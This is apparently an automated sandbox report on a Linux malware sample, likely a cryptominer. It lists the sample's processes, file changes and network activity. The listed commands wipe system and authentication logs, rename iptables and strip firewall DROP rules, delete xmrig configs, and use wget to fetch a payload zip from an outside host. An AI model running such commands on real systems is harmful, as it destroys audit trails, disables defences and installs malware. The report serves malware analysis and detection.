Technical Information
Malicious functions:
Launches processes:
- mv /sbin/iptables /sbin/tokens
- grep 46.101
- rm -rf /var/log/auth.log /var/log/auth.log.1 /var/log/auth.log.2.gz /var/log/auth.log.3.gz /var/log/auth.log.4.gz
- <SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
- mkdir /etc/calendar/cecece
- grep 146.190
- grep 144.126
- md5sum
- rm -rf /var/log/messages /var/log/messages.1 /var/log/messages.2.gz /var/log/messages.3.gz /var/log/messages.4.gz
- rm -rf /root/.config/xmrig.json
- sysctl -p
- xargs -rL1 iptables -D INPUT -j DROP -s
- mv /usr/sbin/iptables /usr/sbin/tokens
- mv /sbin/tokens /sbin/iptables
- grep 67.207
- mkdir /etc/calendar
- cat /tmp/.XlM-unix
- rm -rf /var/log/syslog /var/log/syslog.1 /var/log/syslog.2.gz /var/log/syslog.3.gz /var/log/syslog.4.gz
- head -c 8
- wget --timeout=5 --tries=2 http://w.mane.fun/p.zip -q -O /tmp/p.zip
- /usr/bin/mawk awk {print $8}
- grep 172.105
- grep 138.68
- mv /usr/sbin/tokens /usr/sbin/iptables
- rm -rf /var/www/html/config.json
- grep 167.172
- rm -rf /root/.xmrig.json
- grep 172.104
- <0xc>
- grep 157.245
- /usr/sbin/xtables-nft-multi iptables -L INPUT -v -n
- rm -rf /var/log/secure*
- sleep 1
Performs operations with the file system:
Creates folders:
- /etc/calendar
- /etc/calendar/cecece
Creates or modifies files:
- /etc/sysctl.conf
- /proc/sys/fs/file-max
- /usr/sbin/iptables
- /tmp/p.zip
Deletes files:
- /var/log/messages
- /var/log/messages.1
- /var/log/messages.2.gz
- /var/log/messages.3.gz
- /var/log/messages.4.gz
- /var/log/auth.log
- /var/log/auth.log.1
- /var/log/auth.log.2.gz
- /var/log/auth.log.3.gz
- /var/log/auth.log.4.gz
- /var/log/syslog
- /var/log/syslog.1
- /var/log/syslog.2.gz
- /var/log/syslog.3.gz
- /var/log/syslog.4.gz
Network activity:
Establishes connection:
- 8.#.8.8:53
- 14#.##0.192.68:80
DNS ASK:
- w.##ne.fun
Sends data to the following servers:
- 14#.##0.192.68:80
Receives data from the following servers:
- 14#.##0.192.68:80
